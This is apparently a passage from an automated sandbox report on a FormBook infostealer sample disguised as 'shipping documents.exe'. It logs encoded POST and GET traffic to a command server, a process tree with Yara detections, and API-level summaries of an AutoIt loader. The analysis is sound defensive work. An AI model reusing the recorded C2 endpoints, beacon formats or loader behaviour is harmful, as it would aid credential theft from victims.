38	192.168.2.5	49750	172.67.210.102	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:42.366688013 CEST	793	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 79 79 32 6f 32 42 48 53 45 63 64 43 52 75 38 33 58 54 68 64 77 76 47 6b 53 6e 6a 76 79 4e 43 61 5a 2f 2f 66 4a 59 Data Ascii: jN=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lYyy2o2BHSEcdCRu83XThdwvGkSnjvyNCaZ//fJY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49751	172.67.210.102	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:44.900401115 CEST	1810	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 74 75 79 35 49 52 6c 32 31 30 79 71 6d 76 39 49 61 30 56 47 45 35 58 45 55 55 2b 41 79 30 68 65 77 57 44 7a 37 6b 33 63 33 57 44 62 4a 75 77 70 38 33 5a 33 4a 70 59 62 73 47 72 33 66 70 71 77 41 78 54 64 4e 6e 45 56 4d 76 58 4c 47 39 6d 53 47 78 56 30 39 63 47 58 2f 34 65 4a 48 48 42 36 41 67 77 4b 37 34 5a 56 6e 71 6c 61 77 65 34 47 72 55 47 47 75 52 59 46 31 45 52 72 37 6d 2f 4c 56 63 49 44 36 46 62 57 74 44 4b 6e 2b 56 78 51 69 4b 55 66 52 49 62 57 6d 55 34 4f 6c 38 78 78 2f 4a 54 43 42 [TRUNCATED] Data Ascii: jN=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAI39wnI2KbDFyAcgWgRi8HpsX5daatObl6uPB9WE7Sxz2zCPgfza0n3Ng/iAvb2FMdoQiQiNaF0VJi2ueZDzXwqEFemQwXN/NkPwPuhHlS4bJlD7rgiNi5hmBDFCn+2OAOtuy5IRl210yqmv9Ia0VGE5XEUU+Ay0hewWDz7k3c3WDbJuwp83Z3JpYbsGr3fpqwAxTdNnEVMvXLG9mSGxV09cGX/4eJHHB6AgwK74ZVnqlawe4GrUGGuRYF1ERr7m/LVcID6FbWtDKn+VxQiKUfRIbWmU4Ol8xx/JTCB4XdJM95fyR01R1fF2Z5H0RWhK5UX1RstW0EBImie9DwSfZ3rdUnTzuZWg/aIZdcSbRWVuxaP/slyo3r5wXud9nn3V9JqpYuLI2oDJu2EXLIpjGcx7n2tB6/dYFJXYzlHVvSGZfuwzI1DNBShOPbzQk4IsIXdAl14XlV44RrGuTH2IsyyxdG/yPVRm+cs65klQlXupE3+p5qqcveW1fDvzoPBlmmY/+rzuuI6Wr8Q876f8WaoYNJDHtdRfIDzN6d1Sq0UAYStrlUGfJd5wx54Rk7MmtNLkvXPcf2s53GRutYM0oAKcB1NNgUqRoQgUtwNQKP7sohOYxoqvHrU6fFY7PXIjq9cXvpXPtQD0O2GcRmTTY2z71uvF2SUXGe2pIm5t4Mf8Kh6tB1kge8FmmfN6++KvBWw0Kl7qzM4J6BuCjtD+lDSNrnMyKKIt3r95vkc4cqYko7bdCMMKS3lAMU3oVuI86moD/1R0oWDM8zUONvJZum+DSlOB+ws7cfw3vcMtubKwdDTyHzbaizr+awV2Vj/xL/gaWg65nJmCqAa8Y2p3e0GFwj/uibwpaT7WwaaMsSBiIKy+stKCx44nCrd50RjHvNEMoDdIniA0ILbFaAgmKX0JCtVPVTsx4xO4IKzauTCsJMr+wpoTN8mpmVoHc0sDKefHn6WOV [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49752	172.67.210.102	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:47.443773985 CEST	512	OUT	GET /lfkn/?jN=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT4CuBs9Ly3z32vNrKxrasIe0t0HCtUE4LbxPxJKDUCSn2XA==&uXTT=8FDHY8dP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.dmtxwuatbz.cc Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Target ID:	0
Start time:	00:41:59
Start date:	13/08/2024
Path:	C:\Users\user\Desktop\shipping documents.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\shipping documents.exe"
Imagebase:	0x650000
File size:	1'216'000 bytes
MD5 hash:	832D7C1846198763310AF90DD8C04746
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:42:00
Start date:	13/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\shipping documents.exe"
Imagebase:	0xa80000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275758100.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2275758100.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2282609393.0000000006800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2274836520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2274836520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2282609393.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:42:13
Start date:	13/08/2024
Path:	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe"
Imagebase:	0x20000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4517885588.0000000006290000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4517885588.0000000005890000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	00:42:15
Start date:	13/08/2024
Path:	C:\Windows\SysWOW64\clip.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\clip.exe"
Imagebase:	0x180000
File size:	24'576 bytes
MD5 hash:	E40CB198EBCD20CD16739F670D4D7B74
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4517905581.0000000004690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4517905581.0000000004690000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4517774741.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4517774741.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4516375312.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4516375312.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	00:42:29
Start date:	13/08/2024
Path:	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe"
Imagebase:	0x20000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	00:42:41
Start date:	13/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	5%
Total number of Nodes:	2000
Total number of Limit Nodes:	183

Executed Functions

Function 00653B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00653B7A
IsDebuggerPresent.KERNEL32 ref: 00653B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,007162F8,007162E0,?,?), ref: 00653BFD

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

Part of subcall function 00660A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00653C26,007162F8,?,?,?), ref: 00660ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00653C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007093F0,00000010), ref: 0068D4BC
SetCurrentDirectoryW.KERNEL32(?,007162F8,?,?,?), ref: 0068D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00705D40,007162F8,?,?,?), ref: 0068D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0068D581

Part of subcall function 00653A58: GetSysColorBrush.USER32(0000000F), ref: 00653A62
Part of subcall function 00653A58: LoadCursorW.USER32(00000000,00007F00), ref: 00653A71
Part of subcall function 00653A58: LoadIconW.USER32(00000063), ref: 00653A88
Part of subcall function 00653A58: LoadIconW.USER32(000000A4), ref: 00653A9A
Part of subcall function 00653A58: LoadIconW.USER32(000000A2), ref: 00653AAC
Part of subcall function 00653A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00653AD2
Part of subcall function 00653A58: RegisterClassExW.USER32(?), ref: 00653B28

Part of subcall function 006539E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00653A15
Part of subcall function 006539E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00653A36
Part of subcall function 006539E7: ShowWindow.USER32(00000000,?,?), ref: 00653A4A
Part of subcall function 006539E7: ShowWindow.USER32(00000000,?,?), ref: 00653A53

Part of subcall function 006543DB: _memset.LIBCMT ref: 00654401
Part of subcall function 006543DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006544A6

Strings

This is a third-party compiled AutoIt script., xrefs: 0068D4B4
%n, xrefs: 00653C56
runas, xrefs: 0068D575

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%n
API String ID: 529118366-38505642
Opcode ID: 08344375f257c1ab1db00b2b9bbf5f133ec7a73b10ac9825c7da8caa7112ed66
Instruction ID: 1371413446ac22048fb8b126dcc13267054a1d11741e1abf87b61fbaa8e39c29
Opcode Fuzzy Hash: 08344375f257c1ab1db00b2b9bbf5f133ec7a73b10ac9825c7da8caa7112ed66
Instruction Fuzzy Hash: 7051E970D04258AACF11EBB8EC159ED7BB7BB04741F04817DFC51A22E2DA78564ACB29

Function 00654FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00654EEE,?,?,00000000,00000000), ref: 00654FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00654EEE,?,?,00000000,00000000), ref: 00655010
LoadResource.KERNEL32(?,00000000,?,?,00654EEE,?,?,00000000,00000000,?,?,?,?,?,?,00654F8F), ref: 0068DD60
SizeofResource.KERNEL32(?,00000000,?,?,00654EEE,?,?,00000000,00000000,?,?,?,?,?,?,00654F8F), ref: 0068DD75
LockResource.KERNEL32(Ne,?,?,00654EEE,?,?,00000000,00000000,?,?,?,?,?,?,00654F8F,00000000), ref: 0068DD88

Strings

SCRIPT, xrefs: 00655006
Ne, xrefs: 0068DD85

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT$Ne
API String ID: 3051347437-3757719499
Opcode ID: 63d608e195eed4faeadd3920d99173b7904d524359d53313c9e2116e2946b92c
Instruction ID: 11d37896fdb6f382d02c3d950bca12c49d2b8e26491850fd1bc5a028090c5343
Opcode Fuzzy Hash: 63d608e195eed4faeadd3920d99173b7904d524359d53313c9e2116e2946b92c
Instruction Fuzzy Hash: E4115A75600700AFD7218B65DC58F677BBAEFC9B12F24816DF807862A0DB61E8048660

Function 00654AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00654B2B

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

GetCurrentProcess.KERNEL32(?,006DFAEC,00000000,00000000,?), ref: 00654BF8
IsWow64Process.KERNEL32(00000000), ref: 00654BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00654C45
FreeLibrary.KERNEL32(00000000), ref: 00654C50
GetSystemInfo.KERNEL32(00000000), ref: 00654C81
GetSystemInfo.KERNEL32(00000000), ref: 00654C8D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: b0084ed357b8f5c97beae584512982807ba854ab2deb84a95ac08571d8fd49be
Instruction ID: c5c4080987ae25ddea0b3f73b8f2d353eacdd7b58d614fb287f3337fa7938829
Opcode Fuzzy Hash: b0084ed357b8f5c97beae584512982807ba854ab2deb84a95ac08571d8fd49be
Instruction Fuzzy Hash: 6A91D43194A7C0DEC731DB6894511EABFE6AF2A305F484E9ED4CB93B41D620E94CC729

Function 0065E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Dtq, xrefs: 00693F58
Variable must be of type 'Object'., xrefs: 0069428C
Dtq, xrefs: 00693F1F
Dtq, xrefs: 0065EC21
Dtq, xrefs: 0065EC1A

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID: Dtq$Dtq$Dtq$Dtq$Variable must be of type 'Object'.
API String ID: 0-522314805
Opcode ID: 5631f27f772a8da392a0177d6da860216d779586b6f2d51acbd8fb8f2f1911a6
Instruction ID: cb0a9870d111abfc3957beeef7b9a69ee37244b337d10c95d67ad6985b08d8c9
Opcode Fuzzy Hash: 5631f27f772a8da392a0177d6da860216d779586b6f2d51acbd8fb8f2f1911a6
Instruction Fuzzy Hash: 07A26C74A04205CBCF28CF58C580AA9B7B7FF58301F648169ED16AB351D736AE4ACB91

Function 006B4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0068E7C1), ref: 006B46A6
FindFirstFileW.KERNELBASE(?,?), ref: 006B46B7
FindClose.KERNEL32(00000000), ref: 006B46C7

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 277565d88dfd0814a71abe8eaf93aa1e906f2770a06722244192ecf353f5d732
Instruction ID: da6f4f398fc7d85c361f6a5758f88a9af63482588935037522a03e8934ce51be
Opcode Fuzzy Hash: 277565d88dfd0814a71abe8eaf93aa1e906f2770a06722244192ecf353f5d732
Instruction Fuzzy Hash: A2E0D8718114005B87106778EC4D4EA775E9E06335F100716F836C11E0FBB05E9086D5

Function 00660B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00660BBB
timeGetTime.WINMM ref: 00660E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00660FB3
TranslateMessage.USER32(?), ref: 00660FC7
DispatchMessageW.USER32(?), ref: 00660FD5
Sleep.KERNEL32(0000000A), ref: 00660FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0066105A
DestroyWindow.USER32 ref: 00661066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00661080
Sleep.KERNEL32(0000000A,?,?), ref: 006952AD
TranslateMessage.USER32(?), ref: 0069608A
DispatchMessageW.USER32(?), ref: 00696098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006960AC

Strings

prq, xrefs: 006953D8
@GUI_CTRLHANDLE, xrefs: 0069540E
@GUI_WINHANDLE, xrefs: 006953B9
@GUI_CTRLID, xrefs: 00695364
prq, xrefs: 00695BDE
@COM_EVENTOBJ, xrefs: 0069591A
@TRAY_ID, xrefs: 00695BB9
prq, xrefs: 00695383
prq, xrefs: 0069542D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prq$prq$prq$prq
API String ID: 4003667617-3597775008
Opcode ID: de8ca3e3cbf0508645a90ac974f5113f341f56230acd8f0c07aa4489c6dec93a
Instruction ID: ce0158c931e08d13a512b9778d088c8562944e3f231b284927d3e86b7528b8cd
Opcode Fuzzy Hash: de8ca3e3cbf0508645a90ac974f5113f341f56230acd8f0c07aa4489c6dec93a
Instruction Fuzzy Hash: 46B2C470608741DFDB25DF24C884BAAB7EABF84304F14892DF44A877A1DB75E845CB86

Function 006B93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006B91E9: __time64.LIBCMT ref: 006B91F3

Part of subcall function 00655045: _fseek.LIBCMT ref: 0065505D

__wsplitpath.LIBCMT ref: 006B94BE

Part of subcall function 0067432E: __wsplitpath_helper.LIBCMT ref: 0067436E

_wcscpy.LIBCMT ref: 006B94D1
_wcscat.LIBCMT ref: 006B94E4
__wsplitpath.LIBCMT ref: 006B9509
_wcscat.LIBCMT ref: 006B951F
_wcscat.LIBCMT ref: 006B9532

Part of subcall function 006B922F: _memmove.LIBCMT ref: 006B9268
Part of subcall function 006B922F: _memmove.LIBCMT ref: 006B9277

_wcscmp.LIBCMT ref: 006B9479

Part of subcall function 006B99BE: _wcscmp.LIBCMT ref: 006B9AAE
Part of subcall function 006B99BE: _wcscmp.LIBCMT ref: 006B9AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006B96DC
_wcsncpy.LIBCMT ref: 006B974F
DeleteFileW.KERNEL32(?,?), ref: 006B9785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006B979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006B97AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006B97BE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 87a13fed3147563ddf7726333774a1b069d3b3a372fd06c3e762905888b62fd2
